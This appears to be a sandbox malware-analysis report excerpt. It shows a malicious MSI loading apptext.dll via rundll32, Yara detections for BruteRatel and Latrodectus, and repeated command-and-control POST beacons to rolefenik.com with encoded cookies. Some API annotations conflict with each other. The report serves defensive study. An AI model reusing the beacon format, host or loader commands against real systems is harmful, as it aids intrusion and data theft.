cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FtjB9XCsLuDJM4gGErxgCrArfaPwNqEEsuvpQHbUeIOJZYhBGLVwuCsgyvxUr7owjo8bn40KHdbuAgMdGEodOI2Znkk%2BbxKRLvx1Vf9weavaf%2BDwfpQtABlkmrlh%2BAtR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1dede82b6f3ad3-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1278&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=2177443&cwnd=251&unsent_bytes=0&cid=8ba24d9a3c4788c1&ts=2384&x=0"

2024-11-13 10:03:01 UTC  IN  5 bytes
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 58107 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:03:02 UTC | 414 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1nC6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:03:04 UTC | 779 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:03:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jk6kOhm6CGibthh1jGdT2PdNUn1bBkXNBFxN6CQOOBE5C3dSHZH%2BqU8oNwzvcLTJ1xaeB9YdN75NnzIdSRGgMr61GWrWMcxoVX9djX9yBm5OvnBNnil0n4Kz60Q6IKm%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1dedfb7bb22cc3-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1584&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1052&delivery_rate=1721759&cwnd=251&unsent_bytes=0&cid=acf1e0eebc5e9f10&ts=2366&x=0"
2024-11-13 10:03:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
21 | 192.168.2.8 | 58108 | 172.67.191.232 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:03:05 UTC | 414 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1nCqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:03:07 UTC | 785 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:03:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3mWtjctBqwE%2FIhSXDXWjqfNYJwsOGlq54BLL2Mj6VZa4eG4buPANxyEUiaa0unhWVOcLJU%2BpDL9KH%2BBS7iSSzn0f%2BeaaJsGPp5OjPUgbbUd2uwhj5PVL%2Bz6XszmtWpOm"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1dee0e9fda2cae-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=1886644&cwnd=251&unsent_bytes=0&cid=6dfcc76621d22b21&ts=2328&x=0"
2024-11-13 10:03:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
22 | 192.168.2.8 | 58109 | 172.67.191.232 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:03:08 UTC | 414 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1nCaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:03:11 UTC | 781 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:03:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yqo9paPRpoKsQq4aj1j0ZyOeMIrm2YzlyX0%2Bq5zzz3ufWlZmq4QEBNXFw8VtYjstuOd5hFROFAreFTFj36sgEZ7FY0jbeNqxLPKB10ek6zUWM06ZcTVqehE%2B9y2%2BcE7b"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1dee2159858d29-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1267&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=2188964&cwnd=251&unsent_bytes=0&cid=56aeb28e5b1c7d32&ts=2799&x=0"
2024-11-13 10:03:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
23 | 192.168.2.8 | 58110 | 172.67.191.232 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:03:11 UTC | 414 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1nCKEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:03:14 UTC | 781 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:03:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QHlncDsLTHC3bOKEVXembVsHqISqdcI8qoAKMf1bcRLpyTVSSsKihy2bljyaVKLGKYS%2FeH5T42%2BXo6FAG7%2BuqPg1Vx07M9lQ5y9nSBqjKa4wjEV73Bi7K7CTqi9DXdFq"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1dee37cdef6b48-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1154&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1052&delivery_rate=2468883&cwnd=251&unsent_bytes=0&cid=d7896248afe38d1e&ts=2713&x=0"
2024-11-13 10:03:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
24 | 192.168.2.8 | 58111 | 172.67.191.232 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:03:15 UTC | 414 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1nD6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:03:17 UTC | 783 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:03:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SzNcPy27J3IxP3%2BvAHGouavuPSEm3QQe%2F299TyynWlGopFQlcrRJSeVRWUX7%2F4NbCFmPnEk3uYKqRVe1Mjmfanff8lAZ56Fw%2FZ1lotOWDT24gFSZWbDMmaKbdIWtZVVg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1dee4df8a5e5ee-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1101&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=2578806&cwnd=241&unsent_bytes=0&cid=543ebae575e74569&ts=2537&x=0"
2024-11-13 10:03:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          25192.168.2.858112172.67.191.232443
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:03:18 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1nDqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:03:20 UTC788INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:03:20 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9E4B1iCIH53Q2wry%2FcVMcrpfYkxXOp8P47i5C3btBReGreHuynlQSJcLl8efXtQJD%2FSE8SRMFUSfxUdMv%2BOlIHiv4ur5%2FdDaJSD%2Bw%2B2%2Fy9d0lmKlLYSl5563NeH64tx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dee610fd2466b-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=960&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=2934143&cwnd=251&unsent_bytes=0&cid=af30a1e6de6c0e70&ts=2046&x=0"
                                                                                                                                                          2024-11-13 10:03:20 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session ID: 26
                                                                                                                                                          Source IP: 192.168.2.8
                                                                                                                                                          Source Port: 58114
                                                                                                                                                          Destination IP: 172.67.191.232
                                                                                                                                                          Destination Port: 443

                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                          2024-11-13 10:03:21 UTC | 414 bytes | OUT | POST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1nDaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:03:23 UTC | 783 bytes | IN | HTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:03:23 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BzFHSN%2BpyIRVP14CxYLOY74edMRLYPZ8bFKrLj6yLROd856UfdVoR%2F4i%2B00Okp138LVtM5UiFLO6FCeCKVAja0%2BV2KchnWuHyXM6u7d8KTdn9be7eHZDUKvsfO82rNVw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dee733fc0e75e-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1118&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1052&delivery_rate=2542581&cwnd=251&unsent_bytes=0&cid=0a2e91729253bd23&ts=1832&x=0"
                                                                                                                                                          2024-11-13 10:03:23 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:04:59:15
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\lavi.msi"
                                                                                                                                                          Imagebase:0x7ff772ad0000
                                                                                                                                                          File size:69'632 bytes
                                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:04:59:16
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                          Imagebase:0x7ff772ad0000
                                                                                                                                                          File size:69'632 bytes
                                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:3
                                                                                                                                                          Start time:04:59:16
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 43BC20CBC49545F265F1331995ABDA6D
                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:4
                                                                                                                                                          Start time:04:59:17
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\Installer\MSI2701.tmp
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\Installer\MSI2701.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\apptext.dll, Object
                                                                                                                                                          Imagebase:0x4c0000
                                                                                                                                                          File size:399'328 bytes
                                                                                                                                                          MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                          Reputation:moderate
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:5
                                                                                                                                                          Start time:04:59:17
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object
                                                                                                                                                          Imagebase:0x540000
                                                                                                                                                          File size:61'440 bytes
                                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:6
                                                                                                                                                          Start time:04:59:18
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object
                                                                                                                                                          Imagebase:0x7ff653760000
                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2286244860.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2286424940.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_BruteRatel_2, Description: Yara detected BruteRatel, Source: 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:05:00:41
                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                          Imagebase:0x7ff62d7d0000
                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 0000000B.00000002.3902483361.000000000AB4C000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:1.6%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                            Signature Coverage:38.3%
                                                                                                                                                            Total number of Nodes:389
                                                                                                                                                            Total number of Limit Nodes:10

Control-flow Graph

APIs
  • Part of subcall function 004C57C0: GetCurrentProcess.KERNEL32(00000008,?,C7C71CC4,?,-00000010), ref: 004C57D0
  • Part of subcall function 004C57C0: OpenProcessToken.ADVAPI32(00000000), ref: 004C57D7
• CoInitialize.OLE32(00000000), ref: 004C4C15
• CoCreateInstance.OLE32(005072B0,00000000,00000004,00515104,00000000,?), ref: 004C4C45
• CoUninitialize.COMBASE ref: 004C5187
• _com_issue_error.COMSUPP ref: 004C51B5
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
• String ID:
• API String ID: 928366108-0
• Opcode ID: 1dfd48a3de34507e46d9cb02fb52c7007f49100aa4bbcff3663efa91d9b44316
• Instruction ID: 69d1f2e81ee80397f68c1bb8c0a763f9b6412bcbe1cb8f0a2e93a8f4d3e63c87
• Opcode Fuzzy Hash: 1dfd48a3de34507e46d9cb02fb52c7007f49100aa4bbcff3663efa91d9b44316
• Instruction Fuzzy Hash: 6422A074E04388DFEB11CFA8C948B9EBBB4AF55304F14819EE405EB381DB79AA45CB51

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 004C6AC8
• OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 004C6AD5
• CloseHandle.KERNEL32(00000000), ref: 004C6AF5
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: Process$CloseCurrentHandleOpenToken
• String ID: S-1-5-18
• API String ID: 4052875653-4289277601
• Opcode ID: d726a5d2ec9f04e1ae33c4eee48f3340eafff6755cbd0813215f239fb7ae5079
• Instruction ID: 215e4d5be17be4e24cd14c89395f0432ae1e725584b6b16aadf632889f43c2d8
• Opcode Fuzzy Hash: d726a5d2ec9f04e1ae33c4eee48f3340eafff6755cbd0813215f239fb7ae5079
• Instruction Fuzzy Hash: 0002D278900249CFDF44DFA4C954BAEBBB5EF45304F15825ED802AB285EB78AE05CB94

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32(00000008,?,C7C71CC4,?,-00000010), ref: 004C57D0
• OpenProcessToken.ADVAPI32(00000000), ref: 004C57D7
• GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 004C580C
• CloseHandle.KERNEL32(?), ref: 004C5822
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpen
• String ID:
• API String ID: 215268677-0
• Opcode ID: ec02faacfa802f9b9a4dc7f01854a7d7ad1e5721ea67e527792a22fb8d052a84
• Instruction ID: 15cc83243abd773a65f9f9cecdd002f684613fc04d890954327cf53dae0abe07
                                                                                                                                                            • Opcode Fuzzy Hash: ec02faacfa802f9b9a4dc7f01854a7d7ad1e5721ea67e527792a22fb8d052a84
                                                                                                                                                            • Instruction Fuzzy Hash: A5F01274548305AFE7109F10EC49B9F7BE8BB54700F548919F994C2260D379A55CEF63

APIs
• GetCommandLineW.KERNEL32(C7C71CC4,?,?,?,?,?,?,?,?,?,005056D5,000000FF), ref: 004CCDE8
  • Part of subcall function 004C1F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,004C4251,C7C71CC4,00000000,?,00000000,?,?,?,00504400,000000FF,?), ref: 004C1F9D
• ExitProcess.KERNEL32 ref: 004CCEB1
  • Part of subcall function 004C6600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 004C667E
Note: the subcall at 004C6600 opens a file with GENERIC_WRITE (0x40000000) and CREATE_ALWAYS (2), and the only string is "Full command line:", so this function records the process command line to a freshly created log file before ExitProcess.
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: AllocCommandCreateExitFileLineLocalProcess
• String ID: Full command line:
• API String ID: 1878577176-831861440
• Opcode ID: fd22b24d1b665088b273b928deeea5f57419f438ce5eae6e4560056f4261ad3e
• Instruction ID: 147cc8555969d9499031db26b6c6b49b6483ac6952df318884bb4665e9af8242
• Opcode Fuzzy Hash: fd22b24d1b665088b273b928deeea5f57419f438ce5eae6e4560056f4261ad3e
• Instruction Fuzzy Hash: D2213538A10114ABCB44FB61CC55FEF77A1AF45748F11812EF40697292EF386B09C799

Control-flow Graph (rendered graph not reproduced): basic blocks 4c5e40-4c5f33; a first GetTokenInformation call, a GetLastError check, a retry path through subroutines 4c60d0 or 4e4080, and a second GetTokenInformation call.
APIs
• GetTokenInformation.KERNELBASE(?,00000001(TokenUser),00000000,00000000,004C5E18,C7C71CC4,?), ref: 004C5EB4
• GetLastError.KERNEL32(?,TokenUser,00000000,00000000,004C5E18,C7C71CC4,?), ref: 004C5EBE
• GetTokenInformation.KERNELBASE(?,00000001(TokenUser),?,00000000,00000000,?,TokenUser,00000000,00000000,004C5E18,C7C71CC4,?), ref: 004C5F1A
Note: TOKEN_INFORMATION_CLASS 1 is TokenUser, not TokenIntegrityLevel (0x19) as originally annotated. The first call passes a NULL buffer and zero length, GetLastError is checked for the expected ERROR_INSUFFICIENT_BUFFER, and the call is repeated with a buffer sized from the returned length: the usual two-call pattern for the variable-length TOKEN_USER structure.
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
